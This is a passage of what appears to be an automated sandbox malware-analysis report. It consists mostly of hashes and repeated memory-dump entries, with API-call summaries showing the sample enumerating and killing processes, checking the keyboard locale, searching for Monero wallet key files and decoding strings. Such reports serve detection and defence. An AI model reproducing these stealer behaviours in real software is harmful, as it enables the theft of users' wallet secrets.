                                        • Opcode ID: 2cc97e41e2c7b83417411ddef29d2eedd28e415ff8a4257a70bfd69158eed878
                                        • Instruction ID: d9c73fcb7ef2a1b21e6f3fd13849bf7a3de697cc62875d225830e62aaa329c95
                                        • Opcode Fuzzy Hash: 2cc97e41e2c7b83417411ddef29d2eedd28e415ff8a4257a70bfd69158eed878
                                        • Instruction Fuzzy Hash: 2E9145B2A001189BCB14FB74ED979ED73BDAF94340F0459A8F90776185EE349B48CB92
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E29905
                                        • Process32First.KERNEL32(00E19FDE,00000128), ref: 00E29919
                                        • Process32Next.KERNEL32(00E19FDE,00000128), ref: 00E2992E
                                        • StrCmpCA.SHLWAPI(?,00E19FDE), ref: 00E29943
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E2995C
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E2997A
                                        • CloseHandle.KERNEL32(00000000), ref: 00E29987
                                        • CloseHandle.KERNEL32(00E19FDE), ref: 00E29993
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: f0d2bebc4fd7b38b59237fa29e0415131c529d6be85c0f0d32e3397944231e9f
                                        • Instruction ID: 5f5ea97308e1ecbf42021d414aef119a0bd6eadb9c58f21db002e1b53a5af718
                                        • Opcode Fuzzy Hash: f0d2bebc4fd7b38b59237fa29e0415131c529d6be85c0f0d32e3397944231e9f
                                        • Instruction Fuzzy Hash: 97111F75900318ABCB24DFA5EC48BDDB7B9BB88700F0055CCF545AA244D7799A84CF90
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,00E305B7), ref: 00E27D71
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00E27D89
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00E27D9D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E27DF2
                                        • LocalFree.KERNEL32(00000000), ref: 00E27EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        • Opcode ID: d1e744e0f8231fea1779e944f8c26beeea4de76f8c8843cfa361b97e7c959119
                                        • Instruction ID: 6381a3acdc7f8fb860bb4f52b2d2c7682bfd5357ba5e00c63ffdc2498d350e4b
                                        • Opcode Fuzzy Hash: d1e744e0f8231fea1779e944f8c26beeea4de76f8c8843cfa361b97e7c959119
                                        • Instruction Fuzzy Hash: E3413F71940228ABCB24DB94EC99BEEB7B5FF44700F2451D9E10A76281DB746F84CFA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 3!]y$5tw$Lr?$L|~'$L7w$t<oV$dg
                                        • API String ID: 0-1512165448
                                        • Opcode ID: ddcdceabe79febcc8d75f302a740908431663d4eef99f3caf18458fa87807d4e
                                        • Instruction ID: a8e3ba13caadabfb2c8d45d43c6cfea3de482454d17bc6546f27308c8cbe720f
                                        • Opcode Fuzzy Hash: ddcdceabe79febcc8d75f302a740908431663d4eef99f3caf18458fa87807d4e
                                        • Instruction Fuzzy Hash: F2B22AF360C2049FE304AE2DEC8567AB7E9EFD4720F1A493DEAC4C3744E67598058696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: +Eo'$+Eo'$C4fz$SD?y$^nF${Pd2$Aw
                                        • API String ID: 0-2759302741
                                        • Opcode ID: 77d3b8c49c24af3d6b267754e4a1d58cc633e8c31b8d638cde5a4ef9c59326e3
                                        • Instruction ID: e3e77a927f0a297570bd4224b5611a6665003f5cf5a7cd3157c43617fe6ba35b
                                        • Opcode Fuzzy Hash: 77d3b8c49c24af3d6b267754e4a1d58cc633e8c31b8d638cde5a4ef9c59326e3
                                        • Instruction Fuzzy Hash: 0AB24AF3A0C2009FE708AE2DDC8567ABBE5EF94720F1A493DEAC5C7744E53598018697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 8F$0R{}$R?}$\+7z$\]zo$`]zo$aUw_
                                        • API String ID: 0-2169715473
                                        • Opcode ID: 0e872acd87ada11bbbf5ec76f0246614a17297282181d090fb829a78009c4089
                                        • Instruction ID: 941e69aaf8568b282571d10adbe3daec6a734b9a177dc2a8b7b4ed7f213b0302
                                        • Opcode Fuzzy Hash: 0e872acd87ada11bbbf5ec76f0246614a17297282181d090fb829a78009c4089
                                        • Instruction Fuzzy Hash: 9DB207F3A0C6009FE704AE2DEC8567ABBE5EFD4320F1A853DEAC4C7744E63558058696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: %RF$(EG$h ~$mjw}$tp-|$x#P$rv[
                                        • API String ID: 0-3554432174
                                        • Opcode ID: 4049dfb48f89d3aab76bb7df0f03e2a425fd62d49f5f057ab6d35e55a35c5f34
                                        • Instruction ID: 9490363c7ce7b4e24505a5fcac167f4f5c1a6f56aef6cb1eb167a8d19cef6199
                                        • Opcode Fuzzy Hash: 4049dfb48f89d3aab76bb7df0f03e2a425fd62d49f5f057ab6d35e55a35c5f34
                                        • Instruction Fuzzy Hash: 56B2C1B360C604AFE3046F29EC8567AFBE9EF94720F16492DE6C5C3744E63598408B97
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E30D79), ref: 00E1E5A2
                                        • StrCmpCA.SHLWAPI(?,00E315F0), ref: 00E1E5F2
                                        • StrCmpCA.SHLWAPI(?,00E315F4), ref: 00E1E608
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1ECDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        • Opcode ID: 0d7e40bf4a4b4eb046a83691bf7d3da91fcfbe0755735af28e071f07f521ef41
                                        • Instruction ID: 6b37db10d4bf60472e05af5c2981a1f73e396f8bc4eec7243fecc976b42b4243
                                        • Opcode Fuzzy Hash: 0d7e40bf4a4b4eb046a83691bf7d3da91fcfbe0755735af28e071f07f521ef41
                                        • Instruction Fuzzy Hash: 7012F172A101289BCB14FB60EDA7EED73B9AF54300F4855F9B50A76191EE306F48CB52
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: &l@$&l@$3w'$5u?o$M=$_V
                                        • API String ID: 0-2860400531
                                        • Opcode ID: 29fb3af7ac6306df4e47f2df84edd90effa67454228a0fbde3f7128c4facd0e9
                                        • Instruction ID: 620f636ebce1dce15cd06ed7e75959c03a4cc73c6da05a4c6677d8daa187ac79
                                        • Opcode Fuzzy Hash: 29fb3af7ac6306df4e47f2df84edd90effa67454228a0fbde3f7128c4facd0e9
                                        • Instruction Fuzzy Hash: A5B208F3A0C2049FE704AE2DEC4567ABBE9EFD4720F1A453DEAC4C3744EA3558058696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: /y~>$VG~+$Z$~$i}u@$kww$nG
                                        • API String ID: 0-4078536043
                                        • Opcode ID: b9381d1525e2395afe05c4b2d3a821d15bd2685c799ddd8c5d3d997e2fdf6952
                                        • Instruction ID: ca3fc6dae69e67c7a9e1a3dfe27c37d100d70006288d1063e796e2dbb4590d40
                                        • Opcode Fuzzy Hash: b9381d1525e2395afe05c4b2d3a821d15bd2685c799ddd8c5d3d997e2fdf6952
                                        • Instruction Fuzzy Hash: A3B2F5F3A0C204AFE3146E2DEC8567AFBE9EBD4720F164A3DE6C4C3744E63558058692
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A23F
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00E14F3E,00000000,?), ref: 00E1A251
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A27A
                                        • LocalFree.KERNEL32(?,?,?,?,00E14F3E,00000000,?), ref: 00E1A28F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID: >O
                                        • API String ID: 4291131564-1870091082
                                        • Opcode ID: 72daca3b4fc441d552e6a0e1652195e170c3ea3af9a80ac0dbf322742135a627
                                        • Instruction ID: aca274c12e14cb7ba7c703d3c3ef8a996e0cf531680423397e9bc71e001736d5
                                        • Opcode Fuzzy Hash: 72daca3b4fc441d552e6a0e1652195e170c3ea3af9a80ac0dbf322742135a627
                                        • Instruction Fuzzy Hash: 2811A474641308AFEB11CF64C895FAA77B5EB89B14F208458FD159F390C7B6A941CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
